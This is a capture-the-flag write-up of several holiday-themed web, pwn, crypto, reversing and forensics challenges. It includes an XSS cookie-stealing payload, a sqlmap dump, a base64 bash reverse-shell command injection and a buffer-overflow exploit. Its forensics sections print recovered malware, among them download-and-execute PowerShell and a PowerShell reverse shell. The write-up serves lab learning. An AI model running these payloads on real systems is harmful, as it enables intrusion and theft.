Web - Toy Workshop
Description: The work is going well on Santa's toy workshop but we lost contact with the manager in charge! We suspect the evil elves have taken over the workshop, can you talk to the worker elves and find out?
We are given a link to a website, and a file web_toy_workshop.zip containing the contents of the website. Browsing to the site, we see that clicking on the head of an elf brings up a dialog box which we can submit.
Looking at the code shows that the inputted text is placed into the database, and then read by the bot.
router.post('/api/submit', async (req, res) => {
const { query } = req.body;
if(query){
return db.addQuery(query)
.then(() => {
bot.readQueries(db);
res.send(response('Your message is delivered successfully!'));
});
}
return res.status(403).send(response('Please write your query first!'));
});
This shows a glaring XSS flaw as the inputted data is not sanitized.
Doing a quick proof of concept test, we input some HTML which loads an image off a python webserver we're hosting.
<img src = 'http://104.196.222.29:9001/gotten' />
And we get a hit
reelix@reelix-1:~/ctf/htb$ python3 -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...
134.209.18.133 - - [01/Dec/2021 17:09:05] code 404, message File not found
134.209.18.133 - - [01/Dec/2021 17:09:05] "GET /gotten HTTP/1.1" 404 -
Going back to the challenge files, we see in the bot.js file that the bot loads the flag in its cookies, so we alter our XSS payload to send us those.
<script>document.location='http://104.196.222.29:9001/pwned?cookie='+document.cookie</script>
And surely enough, we get the flag
134.209.18.133 - - [01/Dec/2021 17:10:41] code 404, message File not found
134.209.18.133 - - [01/Dec/2021 17:10:41] "GET /pwned?cookie=flag=HTB{3v1l_3lv3s_4r3_r1s1ng_up!} HTTP/1.1" 404 -
Web - Toy Management
Description: The evil elves have changed the admin access to Santa's Toy Management Portal. Can you get the access back and save the Christmas?
Similar to the first web challenge we are given a link to a website, and a file web_toy_management.zip containing the contents of the website.
Browsing to the website we have a username / password box. Investigating how this works, we browse to the index.js file and discover:
router.post('/api/login', async (req, res) => {
const { username, password } = req.body;
if (username && password) {
passhash = crypto.createHash('md5').update(password).digest('hex');
return db.loginUser(username, passhash)
.then(user => {
if (!user.length) return res.status(403).send(response('Invalid username or password!'));
JWTHelper.sign({ username: user[0].username })
.then(token => {
res.cookie('session', token, { maxAge: 43200000 });
res.send(response('User authenticated successfully!'));
})
})
.catch(() => res.status(403).send(response('Invalid username or password!')));
}
return res.status(500).send(response('Missing parameters!'));
});
So, it's taking the username and an md5 hash of the password, and posting them (Unaltered) to /api/login to the "db.loginUser" method. Let's open database.js and take a look!
async loginUser(user, pass) {
return new Promise(async (resolve, reject) => {
let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`;
this.connection.query(stmt, (err, result) => {
if(err)
reject(err)
try {
resolve(JSON.parse(JSON.stringify(result)))
}
catch (e) {
reject(e)
}
})
});
}
Yikes - It runs a select statement, and adds the values without sanitizing them! This is definately a SQL Injection attack!
Browsing through the files, it looks like our flag is stored in the toydb database, in the toylist table, in the toy column with an id of 7. Let's use this info and get the flag!
Note: I initially tried to just login given the cracked hashes from the users table, although this did not work.
First, we do an attempted login, and capture the request to send to sqlmap, ending up with:
cat request.txt
POST /api/login HTTP/1.1
Host: 206.189.124.137:30777
{"username":"admin", "password":"pass"}
We then use file to let sqlmap do its job!
Command: sqlmap -r request.txt -D toydb -T toylist -C toy --where "id=7" --dump --time-sec=1
After a bit of time, we get the flag!
Database: toydb
Table: toylist
[1 entry]
+------------------------------+
| toy |
+------------------------------+
| HTB{1nj3cti0n_1s_in3v1t4bl3} |
+------------------------------+
Thanks to soc1ety in the HackTheBox Discord channel for teaching me that sqlmap has a --where parameter when dumping which saved some time as this was a time-based blind attack, and was very slow.
Web - Gadget Santa
Description: It seems that the evil elves have broken the controller gadget for the good old candy cane factory! Can you team up with the real red teamer Santa to hack back?
Similar to the previous two challengse we are given a link to a website, and a file web_gadget_santa.zip containing the contents of the website.
Browsing to the website, we have a list of commands down the left which return some output. Going by the MonitorModel.php file we are given, it takes the command, and runs it.
I quickly decided to test out basic command concatenation and ended off with basic code execution by changing the command to ?command=list_ram;id; and got the displayed id. Well - That was easy!
The next challenge was a little harder - Adding spaces to commands. A %20 didn't work since it wasn't properly HTML encoding the commands. Playing around a bit, I eventually figured out that you could use $IFS as a space character.
http://188.166.174.81:32398/?command=list_ram;ls$IFS-la;
total used free shared buff/cache available
Mem: 7.8Gi 3.4Gi 2.2Gi 128Mi 2.2Gi 4.2Gi
Swap: 0B 0B 0B
total 32
drwxr-xr-x 1 www www 4096 Nov 30 13:30 .
drwxr-xr-x 1 root root 4096 Dec 5 15:07 ..
-rw-r--r-- 1 www www 2786 Nov 30 13:25 Router.php
drwxr-xr-x 1 www www 4096 Nov 30 13:29 controllers
-rw-r--r-- 1 www www 428 Nov 30 13:25 index.php
drwxr-xr-x 1 www www 4096 Nov 30 13:29 models
drwxr-xr-x 1 www www 4096 Nov 30 13:29 static
drwxr-xr-x 1 www www 4096 Nov 30 13:29 views
The next part proved a little more difficult. From the ups_manager.py file in the provided challenge files, I needed to issue a GET request to http://localhost:3000/get_flag to retrieve the flag, but this refused to work when using variations of curl commands - So I was stuck!
Well, if regular commands won't give me proper output - Maybe I can get a shell and go from there!
This part took far longer than it should have. My shell generation script didn't check that the IP / Port were valid and I had accidentally switched them around in the generation command, so no matter how much I tried, I could not get a reverse shell working! Eventually I tried the command locally, it threw an error, and I debugged the issue. With a bit of obfuscation and messing around, I eventually got a reverse shell by using the command:
php$IFS-r$IFS"eval(base64_decode('ZXhlYygiL2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTA0LjE5Ni4yMjIuMjkvOTAwMSAwPiYxJyIpOw=='));"
This uses PHP to evaluate a function which uses base64 to decode an encoded reverse shell, and subsequently runs it. This gets rid of any of the issues that arise when you have weird characters in the shell itself in a URL.
Catching the shell with a netcat listener, I stabilized it, ran the curl command, and received the flag - Victory!
http://188.166.174.81:32398/?command=list_ram;php$IFS-r$IFS%22eval(base64_decode(%27ZXhlYygiL2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTA0LjE5Ni4yMjIuMjkvOTAwMSAwPiYxJyIpOw==%27));%22;
nc -lvnp 9001
Listening on 0.0.0.0 9001
Connection received on 188.166.174.81 34254
id
uid=1000(www) gid=1000(www) groups=1000(www)
python3 -c "import pty;pty.spawn('/bin/bash');"
www@webgadgetsanta-26444-5dc4b9f749-c4bn2:/www$ curl http://localhost:3000/get_flag
<749-c4bn2: code="" curl="" get_flag="" http:="" localhost:3000="" nt4_i5_th3_r34l_r3d_t34m3r="" status="" www="">749-c4bn2:>
Note - The above originally contained the flag but it got lost during editing and I couldn't re-run the command as the CTF infrastructure was shut down.
Pwn - Mr Snowy
Description: There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.
First of all, I want to note that I am very bad at Pwn challenges, so much of the information provided in this section may be incorrect or badly explained.
We are given an archive containing a single file - mr_snowy and a docker container. Running the Linux file command on this file shows it to be a 64-bit ELF.
Opening the file in Ghidra, we see the following:
1.) The main function sets up a few things, displays the banner, and then runs the snowman function which - If 1 is inputted - runs the investigate function.
2.) In the investigate function, local_48 is assigned 64 characters of space, the user input is read, and assigned to it.
3.) There is a function deactivate_camera at 0x401165 which displays the flag.
This is a standard Buffer Overflow scenario. Entering more than 64 characters will overflow out of the memory assigned to local_48 and into a point of our choosing. After the assigned 64 characters, we hit the rbp register. We need to enter the rip register to execute code which is found 8 bytes after rbp, so we add 8 to our overflow, and then append our function.
The full code looks like so:
from pwn import *
file_name = "./mr_snowy"
p = process(file_name)
offset = 72 # rbp + 8
payload = b'A' * offset;
payload += p64(0x401165) # Append deactivate_camera
p.recvuntil(b'> ') # Wait for the first entry
p.sendline(b'1') # Run investigate
p.recvuntil(b'> ') # Wait for the input that is read
p.sendline(payload) # Send our payload
p.interactive()
Running this gives the fake flag.
python3 sploit.py
[+] Starting local process './mr_snowy': pid 16786
[*] Switching to interactive mode
[-] Mission failed!
[+] Here is the secret password to deactivate the camera: HTB{f4k3_fl4g_4_t3st1ng}
[*] Got EOF while reading in interactive
Great! Now, we just change it from local to remote by changing
p = process(file_name)
to
p = remote('46.101.39.71',31471)
Run it, and get our flag!
python3 sploit.py
[+] Opening connection to 178.62.90.158 on port 30530: Done
[*] Switching to interactive mode
[-] Mission failed!
[+] Here is the secret password to deactivate the camera: HTB{n1c3_try_3lv35_but_n0t_g00d_3n0ugh}
[*] Got EOF while reading in interactive
Crypto - Common Mistake
Description: Elves are trying very hard to communicate in perfect secrecy in order to keep Santa's warehouse. Unfortunately, their lack of knowledge about cryptography leads them to common mistakes.
We are given an RSA challenge with n1, e1, c1, n2, e2, c2 with n1 == n2
I'm generally terrible at these preferring to solve them programatically, so I googled around for several examples and found an auto-solver for this specific scenario over here.
Plugging in the values and editing the file to remove what I didn't need (I just used the decode function and hard-coded the values) gave me the flag b'HTB{c0mm0n_m0d_4774ck_15_4n07h3r_cl4ss1c}'
Reversing - Infiltration
We got a hold of an internal communication tool being used by the elves, and managed to hook it up to their server. However, it won't let us see their secrets? Can you take a look inside?
We are given a file client. Upon analysis, it appears to be a 64-bit ELF that requires an IP and a port to connect to. Thankfully, we are given both as part of the challenge.
Unfortunately, upon running the client with the provided details, we are simply given the output Untrusted Client Location - Enabling Opaque Mode. This, of course - Does not help.
Browsing through the application using Ghidra did not end off all that helpful due to my limited knowledge of C / Assembly, so I loaded it up in gdb and decided to set a breakpoint on puts to see if I could catch anything interesting.
On running the client in GDB with the breakpoint, I got a hit!
───────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe508 —▸ 0x555555555325 ◂— mov rax, qword ptr [rsp + 0x408]
01:0008│ rsi 0x7fffffffe510 ◂— 0x5f74306e7b425448 ('HTB{n0t_')
02:0010│ 0x7fffffffe518 ◂— 0x30735f3374317571 ('qu1t3_s0')
03:0018│ 0x7fffffffe520 ◂— 0x7d3375713470305f ('_0p4qu3}')
04:0020│ 0x7fffffffe528 ◂— 0x3
05:0028│ 0x7fffffffe530 —▸ 0x5555555550d0 ◂— push r12
06:0030│ 0x7fffffffe538 ◂— 0x0
07:0038│ 0x7fffffffe540 —▸ 0x7ffff7ffbc40 (_rtld_global_ro) ◂— 0x50d1200000000
This gave me the flag HTB{n0t_qu1t3_s0_0p4qu3} which solved the challenge.
Forensics - baby APT
Description: This is the most wonderful time of the year, but not for Santa's incident response team. Since Santa went digital, everyone can write a letter to him using his brand new website. Apparently an APT group hacked their way in to Santa's server and destroyed his present list. Could you investigate what happened?
We are given a file christmaswishlist.pcap. By the extension, we know that this is a packet dump, so we open it in Wireshark.
Following the TCP streams, we see a story unfold.
Stream 3 - A request was made to a webserver, displaying a Drupal banner.
Stream 4 - A Drupal Exploit is being used to give the user Remote Code Execution - Specifically CVE-2018-7600
Stream 7 - A PHP shell is saved to bg.php
Stream 8 - The shell was accessed.
Stream 11 - The shell was used to read the /etc/passwd file on the server.
Stream 27 - The shell was used to run the groups command.
Stream 28 - The shell was used to list the contents of the current folder.
Stream 29 - The shell was used to list the contents of the primary folder on the webserver.
Stream 30 - The websites database was deleted, the text SFRCezBrX24wd18zdjNyeTBuM19oNHNfdDBfZHIwcF8wZmZfdGgzaXJfbDN0dDNyc180dF90aDNfcDBzdF8wZmYxYzNfNGc0MW59 was echoed to /dev/null, and the contents of the primary folder of the webserver was listed again.
For purposes of this CTF we can stop here. The text
SFRCezBrX24wd18zdjNyeTBuM19oNHNfdDBfZHIwcF8wZmZfdGgzaXJfbDN0dDNyc180dF90aDNfcDBzdF8wZmYxYzNfNGc0MW59
is Base64 and decodes to our Flag: HTB{0k_n0w_3v3ry0n3_h4s_t0_dr0p_0ff_th3ir_l3tt3rs_4t_th3_p0st_0ff1c3_4g41n}
Forensics - Honeypot
Description: Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
1. Find the full URL used to download the malware.
2. Find the malicious's process ID.
3. Find the attackers IP
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
Download Link: http://46.101.25.140/forensics_honeypot.zip
So we get given a zip file, and get tasked to find a bunch of information. Given the size of the file (1GB) and the extension (.raw), I assume this to be a memory dump, and examine it with Volatility. For this, I am using Version 2.6 as I am not familiar enough with the syntax of 3.
First of all, we identify the profile used.
volatility.exe -f file.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
We will be using the Win7SP1x86_23418 profile from here on.
First off, we need the full URL used. For this, we turn to the browser history.
volatility.exe -f file.raw --profile=Win7SP1x86_23418 iehistory
Volatility Foundation Volatility Framework 2.6
**************************************************
Process: 3344 iexplore.exe
Cache type "DEST" at 0x5636819
Last modified: 2021-11-25 11:13:50 UTC+0000
Last accessed: 2021-11-25 19:13:52 UTC+0000
URL: Santa@https://windowsliveupdater.com/christmas_update.hta
Well, that was easy enough. Now we need the process ID. All we have is the hta file, so let's examine that!
First, find it.
volatility.exe -f file.raw --profile=Win7SP1x86_23418 filescan | findstr ".hta"
Volatility Foundation Volatility Framework 2.6
0x000000003e396be0 8 0 R--r-d \Device\HarddiskVolume1\Windows\System32\en-US\mshta.exe.mui
0x000000003e710f80 7 0 R--r-d \Device\HarddiskVolume1\Windows\System32\mshta.exe
0x000000003f4d4348 2 0 -W-rwd \Device\HarddiskVolume1\Users\Santa\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M3FMRSOD\christmas_update[1].hta
0x000000003f58ef80 6 0 R--r-- \Device\HarddiskVolume1\Windows\System32\mshta.exe
An address of 0x000000003f4d4348 - Let's save it to examine!
volatility.exe -f file.raw --profile=Win7SP1x86_23418 dumpfiles -Q 0x000000003f4d4348 --name file -D Files
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x3f4d4348 None \Device\HarddiskVolume1\Users\Santa\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M3FMRSOD\christmas_update[1].hta
Opening up the saved file, we see the following:
<html>
<head>
<HTA:APPLICATION id="Microsoft" applicationName="Christmas update"/>
<script>
var sh = new ActiveXObject("WScript.Shell");
sh.run('powershell.exe /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==');
window.close();
</script>
</html>
So it opens up Powershell and runs a command encoded as Base64. Decoding the command returns:
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
Now we have another file. This file we can't find the contents of like we did the .hta file since it was never saved - Now what!
Since it was run using Powershell, let's use that!
First, we scan for the Powershell process.
volatility.exe -f file.raw --profile=Win7SP1x86_23418 psscan
Volatility Foundation Volatility Framework 2.6
Offset(P) Name PID PPID PDB Time created Time exited
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x0000000002c9a940 System 4 0 0x00185000 2021-11-26 05:12:15 UTC+0000
0x0000000002d46470 cygrunsrv.exe 1872 400 0x3f1e5420 2021-11-25 19:12:20 UTC+0000
0x00000000206013a8 svchost.exe 692 400 0x3f1e5160 2021-11-25 19:12:18 UTC+0000
0x000000003e254030 sppsvc.exe 1800 400 0x3f1e54a0 2021-11-25 19:12:22 UTC+0000
0x000000003e27e610 svchost.exe 2080 400 0x3f1e54e0 2021-11-25 19:12:22 UTC+0000
0x000000003e301d28 SearchIndexer. 2360 400 0x3f1e5460 2021-11-25 19:12:26 UTC+0000
0x000000003e316d28 csrss.exe 2616 2604 0x3f1e5520 2021-11-25 19:12:33 UTC+0000
0x000000003e336d28 SearchProtocol 2440 2360 0x3f1e5280 2021-11-25 19:12:26 UTC+0000
0x000000003e33a260 SearchFilterHo 2460 2360 0x3f1e54c0 2021-11-25 19:12:26 UTC+0000
0x000000003e384b00 taskhost.exe 2784 400 0x3f1e5580 2021-11-25 19:12:37 UTC+0000
0x000000003e38db00 whoami.exe 4028 2700 0x3f1e5340 2021-11-25 19:14:01 UTC+0000 2021-11-25 19:14:01 UTC+0000
0x000000003e38f488 dwm.exe 2844 848 0x3f1e55c0 2021-11-25 19:12:37 UTC+0000
0x000000003e391498 explorer.exe 2856 2836 0x3f1e55e0 2021-11-25 19:12:38 UTC+0000
0x000000003e3acd28 regsvr32.exe 3108 2856 0x3f1e5600 2021-11-25 19:12:38 UTC+0000 2021-11-25 19:12:39 UTC+0000
0x000000003e413c60 dwm.exe 1532 848 0x3f1e5360 2021-11-25 19:12:19 UTC+0000
0x000000003e41ab00 explorer.exe 1556 1512 0x3f1e53a0 2021-11-25 19:12:19 UTC+0000
0x000000003e425758 vmicsvc.exe 1540 400 0x3f1e5380 2021-11-25 19:12:19 UTC+0000
0x000000003e442030 svchost.exe 1620 400 0x3f1e53c0 2021-11-25 19:12:19 UTC+0000
0x000000003e46d6f8 VBoxTray.exe 1716 1556 0x3f1e5400 2021-11-25 19:12:20 UTC+0000
0x000000003e5f9b00 wlms.exe 1956 400 0x3f1e5440 2021-11-25 19:12:20 UTC+0000
0x000000003e619700 svchost.exe 744 400 0x3f1e5180 2021-11-25 19:12:18 UTC+0000
0x000000003e6326b8 svchost.exe 572 400 0x3f1e5080 2021-11-26 05:12:17 UTC+0000
0x000000003e673728 winlogon.exe 2644 2604 0x3f1e5540 2021-11-25 19:12:33 UTC+0000
0x000000003e699390 VBoxService.ex 636 400 0x3f1e5140 2021-11-26 05:12:17 UTC+0000
0x000000003e6cad28 cygrunsrv.exe 1612 1872 0x3f1e53e0 2021-11-25 19:12:21 UTC+0000 2021-11-25 19:12:21 UTC+0000
0x000000003e6d5d28 sshd.exe 1676 1612 0x3f1e5480 2021-11-25 19:12:21 UTC+0000
0x000000003e6ed9d8 svchost.exe 848 400 0x3f1e51c0 2021-11-25 19:12:19 UTC+0000
0x000000003e6f2bc0 conhost.exe 1684 308 0x3f1e51a0 2021-11-25 19:12:21 UTC+0000
0x000000003e6f8548 svchost.exe 888 400 0x3f1e51e0 2021-11-25 19:12:19 UTC+0000
0x000000003e721030 svchost.exe 1012 400 0x3f1e5200 2021-11-25 19:12:19 UTC+0000
0x000000003e73c260 svchost.exe 1084 400 0x3f1e5220 2021-11-25 19:12:19 UTC+0000
0x000000003e769b00 spoolsv.exe 1208 400 0x3f1e5240 2021-11-25 19:12:19 UTC+0000
0x000000003e7ae030 svchost.exe 1252 400 0x3f1e5260 2021-11-25 19:12:19 UTC+0000
0x000000003e7d7488 vmicsvc.exe 1376 400 0x3f1e52a0 2021-11-25 19:12:19 UTC+0000
0x000000003e7de428 vmicsvc.exe 1396 400 0x3f1e52c0 2021-11-25 19:12:19 UTC+0000
0x000000003e7eaa60 vmicsvc.exe 1432 400 0x3f1e52e0 2021-11-25 19:12:19 UTC+0000
0x000000003e7ec4b8 taskhost.exe 1440 400 0x3f1e5300 2021-11-25 19:12:19 UTC+0000
0x000000003e7f4398 csrss.exe 360 340 0x3f1e5040 2021-11-26 05:12:16 UTC+0000
0x000000003e7f88b8 vmicsvc.exe 1504 400 0x3f1e5320 2021-11-25 19:12:19 UTC+0000
0x000000003e8aa9b8 iexplore.exe 3344 3324 0x3f1e5640 2021-11-25 19:13:31 UTC+0000
0x000000003e8f5620 services.exe 400 348 0x3f1e50c0 2021-11-26 05:12:16 UTC+0000
0x000000003e8fbd28 lsm.exe 416 348 0x3f1e5100 2021-11-26 05:12:16 UTC+0000
0x000000003e902590 lsass.exe 408 348 0x3f1e50e0 2021-11-26 05:12:16 UTC+0000
0x000000003eeba3f0 wininit.exe 348 300 0x3f1e50a0 2021-11-26 05:12:16 UTC+0000
0x000000003ef47d28 winlogon.exe 496 340 0x3f1e5120 2021-11-26 05:12:17 UTC+0000
0x000000003ef733c8 conhost.exe 3732 2616 0x3f1e5560 2021-11-25 19:13:50 UTC+0000
0x000000003f19bd28 csrss.exe 308 300 0x3f1e5060 2021-11-26 05:12:16 UTC+0000
0x000000003f1e9c80 smss.exe 236 4 0x3f1e5020 2021-11-26 05:12:15 UTC+0000
0x000000003f4da2d0 dllhost.exe 168 572 0x3f1e5680 2021-11-25 19:14:13 UTC+0000
0x000000003f5046c0 conhost.exe 2920 2616 0x3f1e56e0 2021-11-25 19:14:10 UTC+0000
0x000000003f53ed28 VBoxTray.exe 3504 2856 0x3f1e5620 2021-11-25 19:12:46 UTC+0000
0x000000003f588788 WmiPrvSE.exe 3112 572 0x3f1e5660 2021-11-25 19:13:24 UTC+0000
0x000000003f5afc60 iexplore.exe 3324 2856 0x3f1e5500 2021-11-25 19:13:31 UTC+0000
0x000000003f5ee280 DumpIt.exe 2924 2856 0x3f1e5720 2021-11-25 19:14:10 UTC+0000
0x000000003fc0dd28 powershell.exe 2700 3720 0x3f1e55a0 2021-11-25 19:13:50 UTC+0000
0x000000003fc89030 HOSTNAME.EXE 4036 2700 0x3f1e56a0 2021-11-25 19:14:01 UTC+0000 2021-11-25 19:14:01 UTC+0000
There it is - Process ID 2700! Now we need the attackers IP address, so let's dump its memory to analyze. We use a different command since we're dumping the memory of a running process and not the process itself.
volatility.exe -f file.raw --profile=Win7SP1x86_23418 memdump --pid=2700 -D .\Mem
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing powershell.exe [ 2700] to 2700.dmp
Now - Let's take a look and... Oh no - It's a 264MB file! Are we going to get fancy and analyze it in a memory editor? Heck no - Strings to the rescue!
strings 2700.dmp > 2700.txt
Much better - A 41MB file of readable text! Let's open it up, and do a search for the file that was run by Powershell - update.ps1
GET /update.ps1 HTTP/1.1
Host: windowsliveupdater.com
Connection: Keep-Alive
There's the download - A bit further down...
$client = New-Object System.Net.Sockets.TCPClient('147.182.172.189',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Those familiar with reverse shells will immediately recognize this as a Powershell Reverse Shell, and the IP address in clear sight!
Let's use this information, and convert it into the flag format...
echo -n "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189" | md5sum
969b934d7396d043a50a37b70e1e010a -
Convert it to the HTB{} format, and we have our flag!
Forensics - Persist
Description: Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support!
We are given the file forensics_persist.zip which contains the file persist.raw. This looked like another memory dump which was confirmed by Volatility.
volatility.exe -f file.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
This took me awhile to figure out. After many many failed attempts browsing around, I came across a plugin called autoruns. This plugin took a long time to run with no output so I thought it had froze, but eventually gave me what I needed.
volatility.exe --plugins=R:/Utilities/Volatility/autoruns --profile=Win7SP1x86_23418 -f file.raw autoruns
Volatility Foundation Volatility Framework 2.6
Autoruns==========================================
Hive: \SystemRoot\System32\Config\SOFTWARE
Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-26 14:18:38 UTC+0000)
C:\BGinfo\Bginfo.exe /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : bginfo (PIDs: )
Hive: \SystemRoot\System32\Config\SOFTWARE
Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-26 14:18:38 UTC+0000)
%SystemRoot%\system32\VBoxTray.exe : VBoxTray (PIDs: 1456, 2796)
Hive: \??\C:\Users\Santa\ntuser.dat
Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-30 22:04:29 UTC+0000)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc JABQAGEAdABoACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdwBpAG4AZABvAHcAcwBcAHcAaQBuAC4AZQB4AGUAJwA7AGkAZgAgACgALQBOAE8AVAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAFAAYQB0AGgAfQBlAGwAcwBlAHsAbQBrAGQAaQByACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB3AGkAbgBkAG8AdwBzACcAOwAkAGYAbABhAGcAIAA9ACAAIgBIAFQAQgB7AFQAaAAzAHMAMwBfADMAbAB2ADMAcwBfADQAcgAzAF8AcgAzADQAbABsAHkAXwBtADQAbAAxAGMAMQAwAHUAcwB9ACIAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtAC8AdwBpAG4ALgBlAHgAZQAiACwAJABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAGEAdABoAH0AJQA= : cmFuZG9tCg (PIDs: )
--- Snip ---
Decoding the base64 and cleaning it up gave me:
$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%
Which included the flag: HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}
Forensics - Giveaway
Description: Santa's SOC team is working overtime during December due to Christmas phishing campaigns. A new team of malicious actors is targeting mainly those affected by the holiday spirit. Could you analyse the document and find the command & control server?
We are given the file forensics_giveaway.zip containing the file christmas_giveaway.docm. Opening this file with LibreOffice shows us that this file contains macroes (Which it natively disables). Examining the macros shows us one named h containing a large amount of obfuscated VBScript.
Browsing around the VBScript, we come to something that looks interesting.
Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
Open XPFILEDIR For Output As #FileNumber
Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
Manually decoding this and cleaning it up gives us:
HPkXUcxLcAoMHOlj = HPkXUcxLcAoMHOlj = "https://elvesfactory/" + HTB{Th1s_1s_4
cxPZSGdIQDAdRVpziKf = "_pr3s3nt_"
fqtSMHFlkYeyLfs = "3v3ryb0dy_"
ehPsgfAcWaYrJm = "w4nts_f0r_"
FVpHoEqBKnhPO = "chr1stm4s}"
Combining this gives us our flag: HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}